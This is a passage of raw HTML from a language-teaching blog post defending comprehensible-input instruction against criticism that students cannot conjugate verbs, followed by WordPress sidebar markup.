href="http://www.grantboulanger.com/a-nail-in-the-coffin-part-1-ci-increases-enrollment/">Grant Boulanger has thoroughly documented</a>. It also means that, in the long run, students will not do as well in a textbook/grammar program as they will in a C.I. program (<a href="http://www.grantboulanger.com/a-nail-in-the-coffin-part-2-ci-increases-achievement/">see Part Two of Boulanger&#8217;s work here</a>).</p> <p>My <strong>fourth</strong> question to Dan&#8217;s interlocutor is, <strong>if you put a C.I.-taught kid on the spot and get them to <em>meaningfully communicate</em>, can they do it well? </strong>My answer: generally&#8211; <em>if the task is developmentally appropriate&#8212; </em>yes, they can. We have to be <em>realistic</em> about what we can get done in a language class.  Babies get 4,000-5,000 hours of input before they start saying single words; at age 6 (after ~14,000 hrs of input), kids are still making errors with irregular past-tense verbs in English. They are, however, communicating <em>just fine</em>.</p> <p>My <strong>fifth question </strong>to Dan&#8217;s interlocutor: when C.I.-taught kids use <em>sabo</em> instead of <em>sé, </em><strong>how much of a problem is that?</strong> My answer: a Mexican or a Spaniard who hears a kid say &#8220;yo <em>no sabo donde está el baño</em>&#8221; is going to know <em>exactly</em> what the kid is trying to say. This is like a Chinese kid asking you &#8220;<em>where bathroom?&#8221;</em> Mandarin doesn&#8217;t have &#8220;<em>to be</em>&#8221; the way English does, and the Chinese kid obviously hasn&#8217;t &#8220;studied hard enough,&#8221; as a grammarian would say, but <em>we get that the Chinese kid means &#8220;where is the bathroom?&#8221;</em> When a Mexican asks, <em>&#8220;did he went to the bathroom?</em>,&#8221; we understand just fine and we don&#8217;t freak out that, OMG, he didn&#8217;t learn the rule for bla bla bla past tense.</p> <p>My <strong>sixth question</strong> is this: on what State or ACTFL standard does <em>&#8220;can conjugate isolated verb forms in _____ case&#8221;</em> appear? Being able to do this in and of itself is not a communicative objective.</p> <p><strong>Finally</strong>, I&#8217;d point one thing out to Dan&#8217;s interlocutor: When Johnny gets to Spain or Bolivia, he is going to hear more&#8211; and better&#8211; Spanish in 6 days than he will in class <em>in one year</em>.  Input will ramp up so much that Johnny&#8217;s errors will <em>inevitably</em> get corrected by the epic amounts of Spanish he is hearing.</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> </div><!-- .entry-content --> <footer class="entry-meta"> Posted in <a href="https://tprsquestionsandanswers.wordpress.com/category/comprehensible-input-2/" rel="category tag">Comprehensible Input</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/criticism-of-t-p-r-s/" rel="category tag">Criticism of T.P.R.S.</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/focus-on-form/" rel="category tag">Focus on Form</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/grant-boulanger/" rel="category tag">Grant Boulanger</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/legacy-methods/" rel="category tag">legacy methods</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/output-2/" rel="category tag">Output</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/textbooks/" rel="category tag">Textbooks</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/traditional-methods/" rel="category tag">Traditional Methods</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/uncategorized/" rel="category tag">Uncategorized</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/verb-forms/" rel="category tag">Verb Forms</a> <span class="on-date"> on <a href="https://tprsquestionsandanswers.wordpress.com/2018/07/03/but-they-cant-conjugate-verbs/" title="10:20 pm" rel="bookmark"><time class="entry-date" datetime="2018-07-03T22:20:56+00:00">July 3, 2018</time></a></span><span class="by-author"> by <span class="author vcard"><a class="url fn n" href="https://tprsquestionsandanswers.wordpress.com/author/cstolztprs/" title="View all posts by cstolztprs" rel="author">cstolztprs</a></span></span>. <a href="https://tprsquestionsandanswers.wordpress.com/2018/07/03/but-they-cant-conjugate-verbs/#comments">4 Comments</a> </footer><!-- .entry-meta --> </article><!-- #post-# .#post-class-# --> <nav role="navigation" id="nav-below" class="paging-navigation"> <h1 class="screen-reader-text">Post navigation</h1> <div class="nav-previous"><a href="https://tprsquestionsandanswers.wordpress.com/page/2/" ><span class="meta-nav">&larr;</span> Older posts</a></div> </nav><!-- #nav-below --> </div><!-- #content .site-content --> </div><!-- #primary .content-area --> <div id="secondary" class="sidebar-container" role="complementary"> <div class="widget-area"> <aside id="search-2" class="widget widget_search"><form role="search" method="get" class="search-form" action="https://tprsquestionsandanswers.wordpress.com/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" /> </label> <input type="submit" class="search-submit" value="Search" /> </form></aside> <aside id="recent-posts-2" class="widget widget_recent_entries"> <h3 class="widget-title">Recent Posts</h3> <ul> <li> <a href="https://tprsquestionsandanswers.wordpress.com/2019/05/09/gianfranco-contis-claim-and-the-evidence/">Gianfranco Conti&#8217;s Claim and the&nbsp;Evidence</a> </li> <li> <a href="https://tprsquestionsandanswers.wordpress.com/2019/05/02/how-should-i-use-questions-to-assess-reading/">(How) Should I Use Questions to Assess&nbsp;Reading?</a> </li> <li> <a href="https://tprsquestionsandanswers.wordpress.com/2019/04/23/the-rule-of-three-simpler-evaluation/">The Rule of Three: Simpler&nbsp;Evaluation</a> </li> <li> <a href="https://tprsquestionsandanswers.wordpress.com/2019/04/17/can-anyone-teach-a-language/">Can Anyone Teach a&nbsp;Language?</a> </li> <li> <a href="https://tprsquestionsandanswers.wordpress.com/2019/02/25/oral-assessment-made-easy/">Oral Assessment Made&nbsp;Easy</a> </li> </ul> </aside><aside id="recent-comments-2" class="widget widget_recent_comments"><h3 class="widget-title">Recent Comments</h3> <table class="recentcommentsavatar" cellspacing="0" cellpadding="0" border="0"> <tr><td title="cstolztprs" class="recentcommentsavatartop" style="height:48px; width:48px;"><a href="https://tprsquestionsandanswers.wordpress.com" rel="nofollow"><img alt='' src='https://2.gravatar.com/avatar/56e85c3dec5ec155203046a91e540e6b?s=48&#038;d=identicon&#038;r=G' class='avatar avatar-48' height='48' width='48' /></a></td><td class="recentcommentstexttop" style=""><a href="https://tprsquestionsandanswers.wordpress.com" rel="nofollow">cstolztprs</a> on <a href="https://tprsquestionsandanswers.wordpress.com/2019/05/09/gianfranco-contis-claim-and-the-evidence/comment-page-1/#comment-16017">Gianfranco Conti&#8217;s Claim&hellip;</a></td></tr><tr><td title="luisameyer00" class="recentcommentsavatarend" style="height:48px; width:48px;"><a href="http://spanishbms.wordpress.com" rel="nofollow"><img alt='' src='https://1.gravatar.com/avatar/a6107c0a84a20d7b39d596a886049cfd?s=48&#038;d=identicon&#038;r=G' class='avatar avatar-48' height='48' width='48' /></a></td><td class="recentcommentstextend" style=""><a href="http://spanishbms.wordpress.com" rel="nofollow">luisameyer00</a> on <a href="https://tprsquestionsandanswers.wordpress.com/2019/05/09/gianfranco-contis-claim-and-the-evidence/comment-page-1/#comment-16016">Gianfranco Conti&#8217;s Claim&hellip;</a></td></tr><tr><td title="MJ" class="recentcommentsavatarend" style="height:48px; width:48px;"><a href="http://mjtprs.wordpress.com" rel="nofollow"><img alt='' src='https://0.gravatar.com/avatar/645a2cae7544ab495777477bbee08312?s=48&#038;d=identicon&#038;r=G' class='avatar avatar-48' height='48' width='48' /></a></td><td class="recentcommentstextend" style=""><a href="http://mjtprs.wordpress.com" rel="nofollow">MJ</a> on <a href="https://tprsquestionsandanswers.wordpress.com/2019/05/02/how-should-i-use-questions-to-assess-reading/comment-page-1/#comment-16006">(How) Should I Use Questions t&hellip;</a></td></tr><tr><td title="MJ" class="recentcommentsavatarend" style="height:48px; width:48px;"><a href="http://mjtprs.wordpress.com" rel="nofollow"><img alt='' src='https://0.gravatar.com/avatar/645a2cae7544ab495777477bbee08312?s=48&#038;d=identicon&#038;r=G' class='avatar avatar-48' height='48' width='48' /></a></td><td class="recentcommentstextend" style=""><a href="http://mjtprs.wordpress.com" rel="nofollow">MJ</a> on <a href="https://tprsquestionsandanswers.wordpress.com/2019/05/02/how-should-i-use-questions-to-assess-reading/comment-page-1/#comment-16005">(How) Should I Use Questions t&hellip;</a></td></tr><tr><td title="MJ" class="recentcommentsavatarend" style="height:48px; width:48px;"><a href="http://mjtprs.wordpress.com" rel="nofollow"><img alt='' src='https://0.gravatar.com/avatar/645a2cae7544ab495777477bbee08312?s=48&#038;d=identicon&#038;r=G' class='avatar avatar-48' height='48' width='48' /></a></td><td class="recentcommentstextend" style=""><a href="http://mjtprs.wordpress.com" rel="nofollow">MJ</a> on <a href="https://tprsquestionsandanswers.wordpress.com/2019/04/23/the-rule-of-three-simpler-evaluation/comment-page-1/#comment-16004">The Rule of Three: Simpler&hellip;</a></td></tr> </table> </aside><aside id="archives-2" class="widget widget_archive"><h3 class="widget-title">Archives</h3> <ul> <li><a href='https://tprsquestionsandanswers.wordpress.com/2019/05/'>May 2019</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2019/04/'>April 2019</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2019/02/'>February 2019</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2019/01/'>January 2019</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2018/12/'>December 2018</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2018/10/'>October 2018</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2018/09/'>September 2018</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2018/07/'>July 2018</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2018/05/'>May 2018</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2018/04/'>April 2018</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2018/03/'>March 2018</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2018/02/'>February 2018</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2018/01/'>January 2018</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2017/12/'>December 2017</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2017/11/'>November 2017</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2017/10/'>October 2017</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2017/09/'>September 2017</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2017/08/'>August 2017</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2017/07/'>July 2017</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2017/06/'>June 2017</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2017/04/'>April 2017</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2017/03/'>March 2017</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2017/02/'>February 2017</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2017/01/'>January 2017</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2016/12/'>December 2016</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2016/11/'>November 2016</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2016/10/'>October 2016</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2016/09/'>September 2016</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2016/08/'>August 2016</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2016/06/'>June 2016</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2016/05/'>May 2016</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2016/04/'>April 2016</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2016/02/'>February 2016</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2016/01/'>January 2016</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2015/12/'>December 2015</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2015/11/'>November 2015</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2015/10/'>October 2015</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2015/09/'>September 2015</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2015/08/'>August 2015</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2015/07/'>July 2015</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2015/06/'>June 2015</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2015/05/'>May 2015</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2015/04/'>April 2015</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2015/03/'>March 2015</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2015/02/'>February 2015</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2015/01/'>January 2015</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2014/12/'>December 2014</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2014/11/'>November 2014</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2014/10/'>October 2014</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2014/09/'>September 2014</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2014/08/'>August 2014</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2014/06/'>June 2014</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2014/05/'>May 2014</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2014/04/'>April 2014</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2014/03/'>March 2014</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2014/02/'>February 2014</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2014/01/'>January 2014</a></li> </ul> </aside><aside id="categories-2" class="widget widget_categories"><h3 class="widget-title">Categories</h3> <ul> <li class="cat-item cat-item-364865312"><a href="https://tprsquestionsandanswers.wordpress.com/category/showumine/">#showumine</a> </li> <li class="cat-item cat-item-96535990"><a href="https://tprsquestionsandanswers.wordpress.com/category/a-i-m-2/">A.I.M.</a> </li> <li class="cat-item cat-item-386726576"><a href="https://tprsquestionsandanswers.wordpress.com/category/adriana-ramirez-2/">Adriana Ramírez</a> </li> <li class="cat-item cat-item-63356277"><a href="https://tprsquestionsandanswers.wordpress.com/category/alina-filipescu/">Alina Filipescu</a> </li> <li class="cat-item cat-item-84309"><a href="https://tprsquestionsandanswers.wordpress.com/category/assessment-and-evaluation/">Assessment and Evaluation</a> </li> <li class="cat-item cat-item-36690474"><a href="https://tprsquestionsandanswers.wordpress.com/category/bad-ideas-2/">Bad Ideas</a> </li> <li class="cat-item cat-item-91938"><a href="https://tprsquestionsandanswers.wordpress.com/category/beginners/">Beginners</a> </li> <li class="cat-item cat-item-29341281"><a href="https://tprsquestionsandanswers.wordpress.com/category/ben-slavic/">Ben Slavic</a> </li> <li class="cat-item cat-item-2185"><a href="https://tprsquestionsandanswers.wordpress.com/category/best-practices/">Best Practices</a> </li> <li class="cat-item cat-item-106769934"><a href="https://tprsquestionsandanswers.wordpress.com/category/bill-vanpatten/">Bill VanPatten</a> </li> <li class="cat-item cat-item-12412529"><a href="https://tprsquestionsandanswers.wordpress.com/category/blaine-ray/">Blaine Ray</a> </li> <li class="cat-item cat-item-61570978"><a href="https://tprsquestionsandanswers.wordpress.com/category/bob-patrick/">Bob Patrick</a> </li> <li class="cat-item cat-item-30639"><a href="https://tprsquestionsandanswers.wordpress.com/category/boring-stuff/">Boring Stuff</a> </li> <li class="cat-item cat-item-386704727"><a href="https://tprsquestionsandanswers.wordpress.com/category/bowles-montrul-2008/">Bowles &amp; Montrul 2008</a> </li> <li class="cat-item cat-item-221621420"><a href="https://tprsquestionsandanswers.wordpress.com/category/bryan-kandel/">Bryan Kandel</a> </li> <li class="cat-item cat-item-117614"><a href="https://tprsquestionsandanswers.wordpress.com/category/burnout/">Burnout</a> </li> <li class="cat-item cat-item-29341278"><a href="https://tprsquestionsandanswers.wordpress.com/category/carol-gaab/">Carol Gaab</a> </li> <li class="cat-item cat-item-386700768"><a href="https://tprsquestionsandanswers.wordpress.com/category/circling-2/">Circling</a> </li> <li class="cat-item cat-item-189080"><a href="https://tprsquestionsandanswers.wordpress.com/category/classroom-set-up/">Classroom Set-Up</a> </li> <li class="cat-item cat-item-155283707"><a href="https://tprsquestionsandanswers.wordpress.com/category/communi-quete/">Communi-quête</a> </li> <li class="cat-item cat-item-386734652"><a href="https://tprsquestionsandanswers.wordpress.com/category/communicative-teaching-2/">Communicative teaching</a> </li> <li class="cat-item cat-item-386726125"><a href="https://tprsquestionsandanswers.wordpress.com/category/complicated-grammar/">Complicated Grammar</a> </li> <li class="cat-item cat-item-203478736"><a href="https://tprsquestionsandanswers.wordpress.com/category/comprehensible-input-2/">Comprehensible Input</a> </li> <li class="cat-item cat-item-625"><a href="https://tprsquestionsandanswers.wordpress.com/category/conversation/">Conversation</a> </li> <li class="cat-item cat-item-386721912"><a href="https://tprsquestionsandanswers.wordpress.com/category/criticism-of-t-p-r-s/">Criticism of T.P.R.S.</a> </li> <li class="cat-item cat-item-452045"><a href="https://tprsquestionsandanswers.wordpress.com/category/dictation/">Dictation</a> </li> <li class="cat-item cat-item-36578845"><a href="https://tprsquestionsandanswers.wordpress.com/category/edubabble/">Edubabble</a> </li> <li class="cat-item cat-item-415858959"><a href="https://tprsquestionsandanswers.wordpress.com/category/elementary-c-i/">Elementary C.I.</a> </li> <li class="cat-item cat-item-174068162"><a href="https://tprsquestionsandanswers.wordpress.com/category/embedded-reading-2/">Embedded Reading</a> </li> <li class="cat-item cat-item-22604343"><a href="https://tprsquestionsandanswers.wordpress.com/category/eric-hermann/">Eric Hermann</a> </li> <li class="cat-item cat-item-386717815"><a href="https://tprsquestionsandanswers.wordpress.com/category/exit-quizzes-2/">Exit Quizzes</a> </li> <li class="cat-item cat-item-122439"><a href="https://tprsquestionsandanswers.wordpress.com/category/feed-your-head/">Feed Your Head!</a> </li> <li class="cat-item cat-item-87"><a href="https://tprsquestionsandanswers.wordpress.com/category/feedback/">Feedback</a> </li> <li class="cat-item cat-item-306758"><a href="https://tprsquestionsandanswers.wordpress.com/category/first-day-of-school/">First Day of School</a> </li> <li class="cat-item cat-item-4546503"><a href="https://tprsquestionsandanswers.wordpress.com/category/focus-on-form/">Focus on Form</a> </li> <li class="cat-item cat-item-272"><a href="https://tprsquestionsandanswers.wordpress.com/category/fun/">Fun</a> </li> <li class="cat-item cat-item-2765"><a href="https://tprsquestionsandanswers.wordpress.com/category/german/">German</a> </li> <li class="cat-item cat-item-27160597"><a href="https://tprsquestionsandanswers.wordpress.com/category/go-baduk/">Go (Baduk)</a> </li> <li class="cat-item cat-item-1056867"><a href="https://tprsquestionsandanswers.wordpress.com/category/grammar-practice/">Grammar practice</a> </li> <li class="cat-item cat-item-218562102"><a href="https://tprsquestionsandanswers.wordpress.com/category/grammar-teaching-2/">Grammar teaching</a> </li> <li class="cat-item cat-item-258527909"><a href="https://tprsquestionsandanswers.wordpress.com/category/grant-boulanger/">Grant Boulanger</a> </li> <li class="cat-item cat-item-7595"><a href="https://tprsquestionsandanswers.wordpress.com/category/great-ideas/">Great Ideas</a> </li> <li class="cat-item cat-item-202863337"><a href="https://tprsquestionsandanswers.wordpress.com/category/high-frequency-vocabulary/">High-Frequency Vocabulary</a> </li> <li class="cat-item cat-item-453511309"><a href="https://tprsquestionsandanswers.wordpress.com/category/i-f-l-t/">I.F.L.T.</a> </li> <li class="cat-item cat-item-79351"><a href="https://tprsquestionsandanswers.wordpress.com/category/jargon/">Jargon</a> </li> <li class="cat-item cat-item-49160700"><a href="https://tprsquestionsandanswers.wordpress.com/category/language-acquisition-2/">Language Acquisition</a> </li> <li class="cat-item cat-item-153023708"><a href="https://tprsquestionsandanswers.wordpress.com/category/laura-sexton/">Laura Sexton</a> </li> <li class="cat-item cat-item-309364597"><a href="https://tprsquestionsandanswers.wordpress.com/category/laurie-clarq/">Laurie Clarq</a> </li> <li class="cat-item cat-item-289415188"><a href="https://tprsquestionsandanswers.wordpress.com/category/legacy-methods/">legacy methods</a> </li> <li class="cat-item cat-item-393096"><a href="https://tprsquestionsandanswers.wordpress.com/category/less-is-more/">Less Is More</a> </li> <li class="cat-item cat-item-386749354"><a href="https://tprsquestionsandanswers.wordpress.com/category/lightbrown-spada-2013/">Lightbrown &amp; Spada 2013</a> </li> <li class="cat-item cat-item-386737206"><a href="https://tprsquestionsandanswers.wordpress.com/category/low-frequency-vocabulary-2/">Low-Frequency Vocabulary</a> </li> <li class="cat-item cat-item-386723738"><a href="https://tprsquestionsandanswers.wordpress.com/category/marc-fencil/">Marc Fencil</a> </li> <li class="cat-item cat-item-150909165"><a href="https://tprsquestionsandanswers.wordpress.com/category/martina-bex/">martina bex</a> </li> <li class="cat-item cat-item-270564"><a href="https://tprsquestionsandanswers.wordpress.com/category/mastery/">Mastery</a> </li> <li class="cat-item cat-item-501261939"><a href="https://tprsquestionsandanswers.wordpress.com/category/meredith-mcdonald-white/">Meredith McDonald White</a> </li> <li class="cat-item cat-item-94152362"><a href="https://tprsquestionsandanswers.wordpress.com/category/merrill-swain/">Merrill Swain</a> </li> <li class="cat-item cat-item-142551"><a href="https://tprsquestionsandanswers.wordpress.com/category/metacognition/">Metacognition</a> </li> <li class="cat-item cat-item-377384118"><a href="https://tprsquestionsandanswers.wordpress.com/category/mike-coxon/">Mike Coxon</a> </li> <li class="cat-item cat-item-341415206"><a href="https://tprsquestionsandanswers.wordpress.com/category/mike-peto/">Mike Peto</a> </li> <li class="cat-item cat-item-5029161"><a href="https://tprsquestionsandanswers.wordpress.com/category/movietalk/">Movietalk</a> </li> <li class="cat-item cat-item-18"><a href="https://tprsquestionsandanswers.wordpress.com/category/music/">Music</a> </li> <li class="cat-item cat-item-386732479"><a href="https://tprsquestionsandanswers.wordpress.com/category/one-word-at-a-time-stories-owaats/">One Word At A Time Stories (OWAaTS)</a> </li> <li class="cat-item cat-item-38752309"><a href="https://tprsquestionsandanswers.wordpress.com/category/output-2/">Output</a> </li> <li class="cat-item cat-item-348936546"><a href="https://tprsquestionsandanswers.wordpress.com/category/p-q-a/">P.Q.A.</a> </li> <li class="cat-item cat-item-386739709"><a href="https://tprsquestionsandanswers.wordpress.com/category/patsy-lightbrown/">Patsy Lightbrown</a> </li> <li class="cat-item cat-item-1319538"><a href="https://tprsquestionsandanswers.wordpress.com/category/paul-nation/">Paul Nation</a> </li> <li class="cat-item cat-item-259993"><a href="https://tprsquestionsandanswers.wordpress.com/category/personalisation/">Personalisation</a> </li> <li class="cat-item cat-item-386703736"><a href="https://tprsquestionsandanswers.wordpress.com/category/personalised-questions-answers-pqa/">Personalised Questions &amp; Answers (PQA)</a> </li> <li class="cat-item cat-item-59534159"><a href="https://tprsquestionsandanswers.wordpress.com/category/picturetalk/">Picturetalk</a> </li> <li class="cat-item cat-item-386732862"><a href="https://tprsquestionsandanswers.wordpress.com/category/ping-pong-reading/">Ping-Pong Reading</a> </li> <li class="cat-item cat-item-2836976"><a href="https://tprsquestionsandanswers.wordpress.com/category/play-2/">Play</a> </li> <li class="cat-item cat-item-386699129"><a href="https://tprsquestionsandanswers.wordpress.com/category/program-assessment-2/">Program Assessment</a> </li> <li class="cat-item cat-item-15213886"><a href="https://tprsquestionsandanswers.wordpress.com/category/projects-2/">Projects</a> </li> <li class="cat-item cat-item-50164"><a href="https://tprsquestionsandanswers.wordpress.com/category/reading-2/">Reading</a> </li> <li class="cat-item cat-item-26152496"><a href="https://tprsquestionsandanswers.wordpress.com/category/reflections-on-practice/">Reflections on Practice</a> </li> <li class="cat-item cat-item-194726"><a href="https://tprsquestionsandanswers.wordpress.com/category/repetition/">Repetition</a> </li> <li class="cat-item cat-item-6860834"><a href="https://tprsquestionsandanswers.wordpress.com/category/research-2/">Research</a> </li> <li class="cat-item cat-item-30751301"><a href="https://tprsquestionsandanswers.wordpress.com/category/retells/">Retells</a> </li> <li class="cat-item cat-item-211523166"><a href="https://tprsquestionsandanswers.wordpress.com/category/roy-lyster/">Roy Lyster</a> </li> <li class="cat-item cat-item-173"><a href="https://tprsquestionsandanswers.wordpress.com/category/science/">Science</a> </li> <li class="cat-item cat-item-4493"><a href="https://tprsquestionsandanswers.wordpress.com/category/scripts/">Scripts</a> </li> <li class="cat-item cat-item-386733286"><a href="https://tprsquestionsandanswers.wordpress.com/category/sequence-of-instruction-2/">Sequence of Instruction</a> </li> <li class="cat-item cat-item-190088"><a href="https://tprsquestionsandanswers.wordpress.com/category/soap-operas/">Soap Operas</a> </li> <li class="cat-item cat-item-386703732"><a href="https://tprsquestionsandanswers.wordpress.com/category/splitmultilevel-classes/">Split/Multilevel Classes</a> </li> <li class="cat-item cat-item-386696484"><a href="https://tprsquestionsandanswers.wordpress.com/category/starting-the-year-2/">Starting The Year</a> </li> <li class="cat-item cat-item-40978208"><a href="https://tprsquestionsandanswers.wordpress.com/category/stephen-d-krashen/">Stephen D. Krashen</a> </li> <li class="cat-item cat-item-312628"><a href="https://tprsquestionsandanswers.wordpress.com/category/steve-smith/">Steve Smith</a> </li> <li class="cat-item cat-item-29775572"><a href="https://tprsquestionsandanswers.wordpress.com/category/stories-2/">Stories</a> </li> <li class="cat-item cat-item-3435084"><a href="https://tprsquestionsandanswers.wordpress.com/category/story-listening/">Story Listening</a> </li> <li class="cat-item cat-item-1807740"><a href="https://tprsquestionsandanswers.wordpress.com/category/student-feedback/">Student Feedback</a> </li> <li class="cat-item cat-item-119908"><a href="https://tprsquestionsandanswers.wordpress.com/category/student-teachers/">Student Teachers</a> </li> <li class="cat-item cat-item-7467807"><a href="https://tprsquestionsandanswers.wordpress.com/category/susan-gross/">Susan Gross</a> </li> <li class="cat-item cat-item-42804108"><a href="https://tprsquestionsandanswers.wordpress.com/category/t-p-r/">T.P.R.</a> </li> <li class="cat-item cat-item-212509918"><a href="https://tprsquestionsandanswers.wordpress.com/category/t-p-r-s/">T.P.R.S.</a> </li> <li class="cat-item cat-item-386700223"><a href="https://tprsquestionsandanswers.wordpress.com/category/t-p-r-s-results-2/">T.P.R.S. Results</a> </li> <li class="cat-item cat-item-72165"><a href="https://tprsquestionsandanswers.wordpress.com/category/teacher-evaluation/">Teacher Evaluation</a> </li> <li class="cat-item cat-item-537"><a href="https://tprsquestionsandanswers.wordpress.com/category/terminology/">Terminology</a> </li> <li class="cat-item cat-item-72321207"><a href="https://tprsquestionsandanswers.wordpress.com/category/terry-waltz/">Terry Waltz</a> </li> <li class="cat-item cat-item-136453"><a href="https://tprsquestionsandanswers.wordpress.com/category/textbooks/">Textbooks</a> </li> <li class="cat-item cat-item-147010869"><a href="https://tprsquestionsandanswers.wordpress.com/category/textivate/">Textivate</a> </li> <li class="cat-item cat-item-386740876"><a href="https://tprsquestionsandanswers.wordpress.com/category/topical-thematic-units/">Topical &amp; Thematic Units</a> </li> <li class="cat-item cat-item-2734043"><a href="https://tprsquestionsandanswers.wordpress.com/category/traditional-methods/">Traditional Methods</a> </li> <li class="cat-item cat-item-1"><a href="https://tprsquestionsandanswers.wordpress.com/category/uncategorized/">Uncategorized</a> </li> <li class="cat-item cat-item-386695207"><a href="https://tprsquestionsandanswers.wordpress.com/category/unsheltered-grammar-2/">Unsheltered Grammar</a> </li> <li class="cat-item cat-item-165452"><a href="https://tprsquestionsandanswers.wordpress.com/category/verb-forms/">Verb Forms</a> </li> <li class="cat-item cat-item-94029278"><a href="https://tprsquestionsandanswers.wordpress.com/category/von-ray/">Von Ray</a> </li> <li class="cat-item cat-item-349"><a href="https://tprsquestionsandanswers.wordpress.com/category/writing/">Writing</a> </li> <li class="cat-item cat-item-215168281"><a href="https://tprsquestionsandanswers.wordpress.com/category/wynne-wong/">Wynne Wong</a> </li> <li class="cat-item cat-item-342403608"><a href="https://tprsquestionsandanswers.wordpress.com/category/zero-prep/">Zero Prep</a> </li> </ul> </aside><aside id="meta-2" class="widget widget_meta"><h3 class="widget-title">Meta</h3> <ul> <li><a href="https://wordpress.com/start?ref=wplogin">Register</a></li> <li><a href="https://tprsquestionsandanswers.wordpress.com/wp-login.php">Log in</a></li> <li><a href="https://tprsquestionsandanswers.wordpress.com/feed/">Entries <abbr title="Really Simple Syndication">RSS</abbr></a></li> <li><a href="https://tprsquestionsandanswers.wordpress.com/comments/feed/">Comments <abbr title="Really Simple Syndication">RSS</abbr></a></li> <li><a href="https://wordpress.com/" title="Powered by WordPress, state-of-the-art semantic personal publishing platform.">WordPress.com</a></li> </ul> </aside><aside id="gravatar-2" class="widget widget_gravatar"></aside><aside id="gravatar-3" class="widget widget_gravatar"></aside><aside id="follow_button_widget-3" class="widget widget_follow_button_widget"> <a class="wordpress-follow-button" href="https://tprsquestionsandanswers.wordpress.com" data-blog="https://tprsquestionsandanswers.wordpress.com" data-lang="en" >Follow t.p.r.s. q&amp;a on WordPress.com</a> <script type="text/javascript">(function(d){var f = d.getElementsByTagName('SCRIPT')[0], p = d.createElement('SCRIPT');p.type = 'text/javascript';p.async = true;p.src = '//widgets.wp.com/platform.js';f.parentNode.insertBefore(p,f);}(document));</script> </aside> </div><!-- .widget-area --> </div><!-- #secondary .sidebar-container --> </div><!-- #main .site-main --> <footer id="colophon" class="site-footer" role="contentinfo"> <div id="tertiary" class="sidebar-container" role="complementary"> <div class="sidebar-inner"> <div class="widget-area"> <aside id="search-2" class="widget widget_search"><form role="search" method="get" class="search-form" action="https://tprsquestionsandanswers.wordpress.com/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" /> </label> <input type="submit" class="search-submit" value="Search" /> </form></aside> <aside id="recent-posts-2" class="widget widget_recent_entries"> <h3 class="widget-title">Recent Posts</h3> <ul> <li> <a href="https://tprsquestionsandanswers.wordpress.com/2019/05/09/gianfranco-contis-claim-and-the-evidence/">Gianfranco Conti&#8217;s Claim and the&nbsp;Evidence</a> </li> <li> <a 